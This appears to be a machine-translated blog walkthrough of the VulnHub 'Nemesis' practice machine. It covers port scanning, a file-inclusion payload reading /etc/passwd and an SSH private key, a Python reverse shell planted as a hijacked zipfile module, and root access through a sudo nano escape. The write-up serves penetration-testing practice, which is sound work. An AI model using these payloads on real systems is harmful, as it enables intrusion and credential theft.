当前位置:网站首页>Penetration practice vulnhub range Nemesis
Penetration practice vulnhub range Nemesis
2022-07-01 17:40:00 【It's safe to go to school on Fubo road】
No.28 Nemesis
Target information
Download address :
https://www.vulnhub.com/entry/ia-nemesis-101,582/
shooting range : VulnHub.com
Target name : IA: Nemesis (1.0.1)
difficulty : secondary - difficult
Release time : 2020 year 10 month 25 Japan
Prompt information :
This box is to improve Linux Privilege escalation and CMS Skills , I hope you like .
The goal is : 2 individual flag
Experimental environment
attack :VMware kali 192.168.7.3
Drone aircraft :Vbox linux IP Automatic access to
information gathering
Scan host
Scan the target in the LAN IP Address
sudo nmap -sP 192.168.7.1/24
The scanned host address is 192.168.7.166
Scan port
Scan the open service port of the target
sudo nmap -sC -sV -p- 192.168.7.166 -oN Nemesis.nmap
Scan to 3 Open ports , among 80(http)52845(http)、52846(SSH), First visit 80 port
Web penetration
http://192.168.7.166
There are some tips after opening the home page , Let's find the bug and fix it , First do a directory scan
Directory scanning
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.166 -x php,html,txt,zip
Scan to contact.php and robots.txt, hold robots.txt Download and see what it has
wget http://192.168.7.166/robots.txt
cat robots.txt
Tip let's find the real vulnerability , Look again. contact.php What is it?
http://192.168.7.166/contact.php
A normal page , Find some tips in the source code
a section php Code , obtain 3 Parameter echo 1 individual , Let's try
http://192.168.7.166/contact.php?name=a&email=b&message=ls
http://192.168.7.166/contact.php?name=a&email=b&message=../../../../etc/passwd
No information is echoed , Maybe the injection point is not here . stay login.html Find some information in the page source code
http://192.168.7.166/login.html
I think it's user name, password and so on. Write it down first , There is also a page thanoscarlos.html Visit
No useful information , visit 52845 port
http://192.168.7.166:52845
After the visit is a html5 Make a website , stay Contact Us I found that some of the contents are the same as the previous php The tips on the page are very similar
The same is 3 Parameters , Let's try
Pop up and save to file after submission , Related to documents , Maybe the file contains , Try again.
The local file contains a vulnerability
After submission, it appears passwd The contents of the document , Take a look at the source code
Two users have login permission , This one below thanos With the front login.html The same one is displayed on the page hacker_in_the_town Could it be a password ,SSH Log in and try ( There's a leak here 1 individual
ssh [email protected] -p 52846
It is logged in with public key , Try to read thanos Public key under user directory
payload
message=../../../../home/thanos/.ssh/id_rsa&submit=
Successfully read the public key file , Save him , Try logging in again
ssh [email protected] -p 52846 -i id_rsa
Check what is in the user directory
ls -al
cat flag1.txt
Find a backup python Scripts and flag1.txt, And then look at backup.py The content of
cat backup.py
This script will /var/www/html Catalog backup to /tmp/website.zip
home There is another one in the catalog carlos User directory , Prompt that you have no permission when accessing , Find the right information
perform sudo -l Time confirmation hacker_in_the_town No thanos Password ,suid There's no authority , Upload a pspy64
kali Open an account on the attack plane http service
python3 -m http.server
Download from the target pspy64
wget http://192.168.7.3:8000/pspy64
pspy64 Add execute permission and run
chmod +x pspy64
./pspy64
You can see UID1000 Of users execute every minute backup.py Script
This UID Namely carlos user , We can use this script to raise rights , Let's take a look at the script
cat backup.py
Here's a quote from zipfile, We can do it in backup.py File directory to create a zipfile.py file
kali Operation on attack
Listen first 4444 port
nc -lvvp 4444
To create a zipfile.py file
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.7.3",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Turn on http service
python3 -m http.server
Download from the target zipfile.py file
wget http://192.168.7.3:8000/zipfile.py
Wait a moment, and the target will automatically execute backup.py Script
Rebound success , Switch to interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z Shortcut key
stty -a
stty raw -echo;fg
reset
Switch complete , see carlos What is in the user directory
ls -al
see flag2.txt
cat flag2.txt
Get the number 2 individual flag, Check it again root.txt
cat root.txt
The prompt says carlos The user's password has been encrypted , The encrypted code is stored in encrypt.py In file , Let's crack the encrypted content , The format is
************FUN********
Let's have a look at encrypt.py What is in the script
cat encrypt.py
Through the script, you can see that it is through affine encrypt Encrypted ,
FAJSRWOXLAXDQZAWNDDVLSU
We went to the dcode.fr Take a look , You should pay attention to using this website , Be sure to wait until all are loaded , Otherwise, the operation will fail
https://www.dcode.fr/chiffre-affine
On the left is the solution , We follow the rules given before Compare the ENCRYPTIONISFUNPASSWORD
We use this password to execute sudo command
sudo -l
Input password ENCRYPTIONISFUNPASSWORD
The password is correct , find sudo A power order nano
sudo /bin/nano /opt/priv
Ctrl + r
Ctrl + x
reset; sh 1>&0 2>&0
Ctrl + r
Ctrl + x
Input reset; sh 1>&0 2>&0
There is no response on the screen after input , In fact, the right has been raised successfully , When the input id You can see
id
Looks a little uncomfortable , use python Switch to interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
cd /root
ls
cat root.txt
Get root.txt, Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .
边栏推荐
- Openlayers customize bubble boxes and navigate to bubble boxes
- Enter wechat applet
- ACM MM 2022视频理解挑战赛视频分类赛道冠军AutoX团队技术分享
- Vulnhub range hacksudo Thor
- DRF --- response rewrite
- pyqt5中,在控件上画柱状图
- GameFramework食用指南
- RadHat搭建内网YUM源服务器
- Countdownlatch blocking wait for multithreading concurrency
- 中国茂金属聚乙烯(mPE)行业研究报告(2022版)
猜你喜欢
[C supplement] [string] display the schedule of a month by date
Mysql database - Advanced SQL statement (2)
多线程并发之CountDownLatch阻塞等待
Kia recalls some K3 new energy with potential safety hazards
June issue | antdb database participated in the preparation of the "Database Development Research Report" and appeared on the list of information technology and entrepreneurship industries
ACL 2022 | decomposed meta learning small sample named entity recognition
剑指 Offer 20. 表示数值的字符串
换掉UUID,NanoID更快更安全!
How to write good code - Defensive Programming Guide
(28) Shape matching based on contour features
随机推荐
Official announcement! Hong Kong University of science and Technology (Guangzhou) approved!
Alibaba cloud Li Feifei: China's cloud database has taken the lead in many mainstream technological innovations abroad
Heavy disclosure! Hundreds of important information systems have been invaded, and the host has become a key attack target
Iommu/smmuv3 code analysis (10) page table operation
PIP version problems: PIP problems still occur when installing akshare and using Tsinghua source and Douban source
GameFramework食用指南
Report on research and investment prospects of China's silicon nitride ceramic substrate industry (2022 Edition)
Maizeer: the two batches of products reported by the media have been taken off the shelves and sealed, and consumer appeals are accepted
【牛客网刷题系列 之 Verilog快速入门】~ 优先编码器电路①
Shenyu gateway development: enable and run locally
Depth first traversal and breadth first traversal [easy to understand]
Good looking UI mall source code has been scanned, no back door, no encryption
DRF --- response rewrite
New patent applications and transfers
How to write good code - Defensive Programming Guide
越来越多地使用 SLO 来实现可观测性|DevOps
SQL注入漏洞(Mysql与MSSQL特性)
(17) DAC conversion experiment
中国锦纶长丝缝纫线发展预测与投资方向研究报告(2022版)
Oom caused by improper use of multithreading